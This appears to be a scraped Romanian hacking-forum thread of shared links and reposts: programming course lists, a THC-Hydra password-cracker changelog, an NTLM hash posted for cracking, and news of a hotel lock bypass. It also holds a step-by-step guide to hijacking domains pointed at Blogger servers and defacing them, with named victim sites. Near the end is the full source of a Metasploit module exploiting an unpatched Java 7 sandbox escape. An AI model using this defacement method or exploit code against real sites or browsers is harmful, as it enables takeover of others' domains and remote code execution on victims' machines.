ionut97

Sursa : Security Override - Articles: DNS Server Auditing

This talk was given at ReCon Reverse Engineering in July 2011. The talk aims to introduce software vulnerability researchers and reverse engineers to some basic concepts of hardware reversing.

Cursuri in limba romana. Continut : - Carcasa Sursa HDD FDD CD DVD - Placa de baza si procesorul - Magistrale PCI PCIe ATA SATA USB - Memorii SDRAM SDR DDR DDR2 DDR3 - Socluri si procesoare clasice Intel si AMD - Socluri si procesoare moderne Intel si AMD Aici.

Course List: -Introduction to Computer Programming Course Stats: There are 13 lessons and 43 videos in this course It takes 4:07:26 to complete this course end to end. -Programming in C Course Stats: There are 27 lessons and 128 videos in this course It takes 11:25:37 to complete this course end to end. -Introduction To Object Oriented Programming Course Stats: There are 11 lessons and 22 videos in this course It takes 2:02:54 to complete this course end to end. -Programming in C++ Course Stats: There are 26 lessons and 144 videos in this course It takes 12:01:38 to complete this course end to end. -Programming in Objective-C Course Stats: There are 30 lessons and 92 videos in this course It takes 12:11:17 to complete this course end to end. -Programming in Java Course Stats: There are 24 lessons and 140 videos in this course It takes 10:07:57 to complete this course end to end. -Programming in C# Course Stats: There are 14 lessons and videos in this course It takes to complete this course end to end. Sursa: Course List | WiBit.net

One of the biggest security holes are passwords, as every password security study shows. A very fast network logon cracker which support many different services, THC-Hydra is now updated to 7.4 version. Hydra available for Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX, Currently supports AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. Change Log New module: SSHKEY - for testing for ssh private keys (thanks to deadbyte(at)toucan-system(dot)com!) Added support for win8 and win2012 server to the RDP module Better target distribution if -M is used Added colored output (needs libcurses) Better library detection for current Cygwin and OS X Fixed the -W option Fixed a bug when the -e option was used without -u, -l, -L or -C, only half of the logins were tested Fixed HTTP Form module false positive when no answer was received from the server Fixed SMB module return code for invalid hours logon and LM auth disabled Fixed http-{get|post-form} from xhydra Added OS/390 mainframe 64bit support (thanks to dan(at)danny(dot)cz) Added limits to input files for -L, -P, -C and -M - people were using unhealthy large files! ;-) Added debug mode option to usage (thanks to Anold Black) Download Sursa: THN

PROGRAMS REQUIRED: -Visual studio C++ express 2010 Or DevC++ -Cheat engine Content: -Find static pointers with Cheat Engine -How to make a trainer in C++ -Hacking with DLL Injection Videos at : C++ HOW TO HACK any game TUTORIAL [Trainer & DLL Injection] DIFFICULTY [2/10]

Hash : 4165E85DB8C02DCAC34469537CFD0654 Tip : NTLM Informati aditionale1: limba: romana Informati aditionale2: min/max caractere= ? Informati aditionale3: caractere speciale = ?

sunt inca activ

TheNewBoston Sute de tutoriale video pentru urmatoarele: -C++ GUI -Java Game Development -Ruby -MySQL -PHP -HTML 5 -XHTML & CSS -Visual Basic -JQuery -C# -Javascript -Android Application Development -C -Java -Python -C++ -UDK + altele pentru : -Adobe After Effects -Dreamweaver -Adobe Photoshop -Matematica -Algebra -Geometrie -Biologie -Chimie -Fizica Tutorialele sunt foarte bune pentru incepatori.

https://www.youtube.com/watch?v=35U2yIG5oJg&feature=plcp

This video demonstrates how to hide (smuggle) Java code as part of other legitimate files. These files, sometimes called GIFAR for GIF+JAR, can be used for advanced cross-site request forgery (XSRF) or smuggling exploit code.

https://www.youtube.com/watch?v=94zzAIDB4wE

[#] Author : Shadow008 [#] Reported On : HackersMedia.com [#] Country : Pakistani Hacker New BlogDNS 0day, Discovered By Shadow008 Lets just say, any site pointing to Google server can Be Hacked and Defaced 1st) Find a target where as its subdomain or its main domain is pointing to google or blogger server I.P 2nd) If it is pointing to Google Server I.P, You will see a page 100% like this >> http://ghs.google.com/ 404. That’s an error. The requested URL / was not found on this server. That’s all we know. If that shows, That means its vul to BlogDNS 0day 3rd) Go to http://www.blogger.com/ and Login / Create an account 4th) Create a Blog 5th) Name it anything you want as a subdomain for blogger. 6th) Once blog is created, Go to Settings > Publishing > Switch To Advanced Mod and add that site URL domain. (example: direct.site.com) Please note that it MUST be pointing to google or blogger server I.P. and Save it. Clear You cache and go to that sites subdomain which you added. You will see its in your control . Now go to Design > Edit HTML > Revert to Classic Template > Add Deface Code There (Switch of Navbar to OFF) and Hit Save, Clear Cache and check site will be defaced . Note: I have used Old Blogger Interface, I don't use the New Blogger Interface as I find the old one more easy I hope it was clear and understood Have fun and don't share. Sites which are hacked using this method: The Hacker News [ THN ] - Best Security Blog Mirror: direct.thehackernews.com hacked. Notified by Shadow008 Hacked: http://mail.sec4ever.com/ Mirror: mail.sec4ever.com hacked. Notified by Shadow008 http://direct.pkhackerz.com/ Mirror: direct.pkhackerz.com hacked. Notified by Shadow008 http://mail.dl4hacks.net/ Mirror: ::::::Add Your Deface:::::: Sursa: RW

https://www.youtube.com/watch?v=e-qb98G5tvk

This video demonstrates cache injection attacks. Cache injection attacks abuse the browser cache and SSL warning corner case to inject a malicious javascript library that will be used to tampers with HTTPS session.

"Unele dintre aplica?iile ei aparent “plictisitoare” ar fi spargerea tuturor codurilor criptografice inventate pân? în prezent, c?utarea ?i g?sirea instantanee a elementelor din baze de date atât de vaste încât n-ar înc?pea pe toate serverele de pe internet, factorizarea unor numere atât de mari încât nicio retea de supercalculatoare contemporane n-ar avea ?ans? de reu?it? în decursul vie?ii noastre. Americanii de la IBM sunt pe cale s? ob?in? acest lucru prin intermediul primului calculator cuantic." Tot articolul aici.

For millions of travelers the ubiquitous hotel key card is the primary and essentially the only way to access their rooms at the end of day. But when you will heard that the key card, you use to access your private room is no longer safe then its very much possible that you will shock. And trust me this happened in Black Hat 2012. A security researcher, Cody Brocious believes the current systems used to secure hotel doors throughout the United States and elsewhere are severely flawed. Speaking at the Black Hat security conference here, Brocious demonstrated how locks from Onity a company that sells security products to hotels and other businesses can easily be bypassed. At the show, Brocious detailed the primary security flaws that allowed him to bypass Onity locks and gain access to rooms. According to eWEEk -Brocious used an open-source tool known as Arduino, a portable programming platform. Arduino was used as a substitute for the commercial portable programmer that an Onity lock would typically require. Brocious explained that the Onity locks have a serial hardware connection that is easily accessible, as well. In addition to the Arduino tool, Brocious used an oscilloscope that allowed him to see what was happening in the lock whenever a key card was put in and the door opened or closed. He was able to determine through his research that the underlying firmware on the lock does not require any form of authentication to arbitrarily access the memory of the lock. This means it is possible to read out every bit of information that is on the lock, which makes it possible for anyone to gain access or make a key. In theory, programming for the lock should go over a secure channel, rather than doing direct unencrypted memory access, said Brocious. The problem, according to his research, is that the existing Onity lock design does not easily allow for that, and there is no easy way to update the firmware. Another potential option is to actually provide physical security on the door lock. For example, the company could make the serial port harder to access. However, with 5 million of these locks in use today, Brocious said this would be an expensive and challenging way to add additional security. The actual door locks are only half the problem exposed by Brocious. The card keys are also at risk. Typical card keys in the Onity system use only 32-bit key encryption making them easy to decrypt, according to Brocious. "The system is broken at every layer," said Brocious. The severity of the issue and its high impact is what led Brocious to choose to release his research at Black Hat. In addition to his research, he is also releasing a software tool so that others can continue or expand on his efforts. "Something needs to be done about this problem, and I didn't want to put it out there in a way that could be defeated by process," said Brocious. "No doubt, this vulnerability has been found before, and it has been in the locks for years." Brocious added: “I'd be surprised if this hasn't been used by malicious actors in the past.” What Brocious is hoping to achieve from this disclosure is not a mass string of hackers getting unauthorized access to hotel rooms, but rather some kind of fix and industry response. "I'm saying that this is what you're vulnerable [to], so come up with a way to solve the problem," said Brocious. Sursa:Black Hat 2012- Key-Card of Hotel Door Can Be Bypassed With An Open-Source Tool "Arduino" ~ VOGH- VOICE OF GREYHAT| Leading Resource of Cyber-Security,Hacking News

Source: Microsoft Windows Kernel Intel x64 SYSRET Proof Of Concept ? Packet Storm This is proof of concept code that demonstrates the Microsoft Windows kernel (Intel/x64) SYSRET vulnerability as described in MS12-042. The shellcode disables code signing and will grant NT SYSTEM privileges to a specified application or already running process. Exploit: http://www.exploit-db.com/sploits/20861.rar

This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) def initialize( info = {} ) super( update_info( info, 'Name' => 'Java 7 Applet Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability Discovery 'jduck', # metasploit module 'sinn3r', # metasploit module 'juan vazquez', # metasploit module ], 'References' => [ #[ 'CVE', '' ], #[ 'OSVDB', '' ], [ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ], [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ] ], 'Platform' => [ 'java', 'win', 'linux' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Arch' => ARCH_JAVA, } ], [ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 26 2012' )) end def on_request_uri( cli, request ) if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_redirect(cli, get_resource() + '/', '') return end print_status("#{self.name} handling request") send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } ) return end paths = [ [ "Exploit.class" ] ] p = regenerate_payload(cli) jar = p.encoded_jar paths.each do |path| 1.upto(path.length - 1) do |idx| full = path[0,idx].join("/") + "/" if !(jar.entries.map{|e|e.name}.include?(full)) jar.add_file(full, '') end end fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-XXXX", path ), "rb") data = fd.read(fd.stat.size) jar.add_file(path.join("/"), data) fd.close end print_status("Sending Applet.jar") send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end def generate_html html = "<html><head></head>" html += "<body>" html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">" html += "</applet></body></html>" return html end end Sursa:http://www.exploit-db.com/exploits/20865/